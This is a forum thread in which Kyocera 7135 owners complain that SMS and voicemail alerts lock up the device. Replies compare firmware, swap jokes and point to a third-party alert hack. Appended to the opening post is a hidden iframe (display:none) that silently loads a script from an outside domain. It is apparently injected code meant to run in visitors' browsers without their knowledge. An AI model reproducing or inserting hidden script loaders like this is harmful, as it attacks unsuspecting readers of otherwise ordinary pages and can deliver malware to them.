+ Reply to Thread
Page 1 of 2 1 2 LastLast

Do incoming messages take yr PDA hostage?

I'm finishing a long review of the 7135 and want to check my experience against others. What happens on mine is below; I really want to hear how others here have seen it. (I'm updating firmware to test again, meanwhile.)

The problem comes from the way the notification manager is invoked by the Messages application whenever the wireless network tells your phone that a text message or voice mail is
    waiting.

The device stops whatever it is doing for the few seconds it takes to receive each incoming message. Then the screen pops up a notification that holds all other functions hostage until you dismiss it. For instance, the notification halts email retrieval and covers whatever was previously on the display. It is annoying in the best of circumstances, and there is no way to turn the function off.

This flaw becomes potentially dangerous in an emergency, because multiple notifications are displayed sequence and override anything else you try to do. More than once I have come off an airplane and switched on the phone, intending to make a quick call. When there are 8 or 10 SMS messages and a
    voicemail waiting, minutes pass while the phone retrieves them in sequence and asks you to acknowledge each one. (If you wait long enough, you can acknowledge them all at once, but you have no way of knowing how many messages are waiting until they stop.) An error on the sender's part once left me dozens of SMS messages, and I did not regain control of the phone
    for more than half an hour.

This didn't happen with the 6035, but that used OS 3.5 and this one uses 4.1.

What do you folks think?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have noticed that myself. After 6PM each night, and all weekend long, I have SnapperMail check e-mail every 15-20 minutes, and if I don't stay on top of my message notifications it holds everything else up (isn't the same also true of appointment reminders?). For all of Friday and some of Saturday I was not receiving my usual SMS messages from VeriChat's proxy server (my guess is that part was down)... and then around 12:30PM they all came flooding in... and during the next 30-60 minutes I received about 25-30 SMS messages.

It has not been a big problem for me, but I can see where it would be a concern for some people.
    Please visit my picture site: Robert-O-Rama :)

So Robert, when you get say 30 SMS in half an hour or more, what happens to other phone functions? Can you make a call? Use your Palm for things. Or do the incoming messages just force themselves on top until they've all arrived?s

Also, it would be valuable to know what versions of the phone software you have, and which carrier.

Thanks!

Incoming SMS tie up my 7135 too - it is a real PITA.

Larry
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

I wonder whether this is true of other Smartphones, or even other phones?

Has anyone had experience like this with a Treo, for instance?

Larry, if you had, say, 10 SMS waiting when you turned on the phone, would several minutes pass before you could make a call?

Originally posted by gellmanb
    So Robert, when you get say 30 SMS in half an hour or more, what happens to other phone functions? Can you make a call? Use your Palm for things. Or do the incoming messages just force themselves on top until they've all arrived?s

Also, it would be valuable to know what versions of the phone software you have, and which carrier.

Thanks!
    It was an unusual thing that happened on Saturday. It wasn't a steady non-stop stream of SMS coming in. Sometimes there was like a minute break before the next wave hit. I was running around town when it was going on, but when the messages were coming in there wasn't much I could do but tap on "ok" or "go to"... and usually there wasn't even enough time to read one message before the next one got there. It was more of an annoyance than anything (at that particular time), but if I really needed to use the phone in a hurry I wouldn't have been very happy! I didn't try very hard to do it, but it seems to me that if you moved really fast you could sneak in a call (maybe with speed or voice dial) if you squeezed the call in between message alerts. But there has to be a better way (although it doesn't appear that there is).

Can you tell me your version numbers? (Phone Info app under the Software drop list.) Kyocera thinks maybe my older firmware is the problem.

Kyocera also says the pop up notification is a carrier requirement. Anyone have any info or informed guess about this? Doesn't seem fully logical, since nearly all their phones (including Kyocera phones) aren't "smart" and do no more than display the envelope icon.

Larry, if you had, say, 10 SMS waiting when you turned on the phone, would several minutes pass before you could make a call?
    Yup. My previous phone was a Treo 300 (Sprint).
    Once a message is waiting, it has seized your phone until
    you click "OK" to get rid of it.

I did notice that a phone call can still come through on the 7135. This was not the case on the Treo. So, this is a step in the right direction.

--John

I wouldn't know, I haven't had the phone off since I got it jan 6th
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Originally posted by larryganz
    I wouldn't know, I haven't had the phone off since I got it jan 6th
    haha... same here, except during the occasional minute here and there during a soft reset.

Mental note to self... call Robert's 7135 at 3am!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Mental note to self... call Robert's 7135 at 3am!
    haha... yeah, just not at 2am (that's when BackupBuddyVFS is doing it's thing! ).

Good to know.

O.k., 3am it is. Talk to ya' then!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Robert K.
    haha... yeah, just not at 2am (that's when BackupBuddyVFS is doing it's thing! ).
    It's reasuring to know that at least someone in that bedroom is getting a little action! :kiss :violinist :rofl :UpThum :scream :naughty :love1 :eek2
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    It's reasuring to know that atleast someone in that bedroom is getting a little action!:kiss :violinist :rofl :UpThum :scream :naughty :love1
    hahahahaha

(look who's talking :p :p )

Ouch!
    ~'kito
    pdaPhoneHome Moderator

any resolution

Has anyone figured out a hack or other soultion for disabling the full screen New Message Alert? Or is there a way to set the phone to dismiss the alert automatically? It "holds my PDA hostage," especially a problem if a new message comes overnight preventing my daily backup buddy backup to card.
    Thanks,
    Kate

there is a 'subtle attention hack' somewhere out there...
    i've been using it on and off for a while and it seems to do what you're looking for...

you should be able to find it through search...

mike

Originally posted by mxpeed
    there is a 'subtle attention hack' somewhere out there...
    i've been using it on and off for a while and it seems to do what you're looking for...
    you should be able to find it through search...
    mike
    Hopefully, the author of it won't get mad at me, but here it is attached to this message for your convenience.
    Attached Files
    Michael

Thanks so much, Mike and Michael.

I have had trouble finding it surfing.

Incidentally, I did find a Treo hack called PBJtime (http://rallypilot.sourceforge.net/treohelper.html) that looked interesting for managing at least the SMS message alerts (not the appointment reminder alerts and voicemail alerts), but I have no idea if it's Kyocera-compatible. Just FYI.

I'll load and try the subtle attention hack tonight!

Kate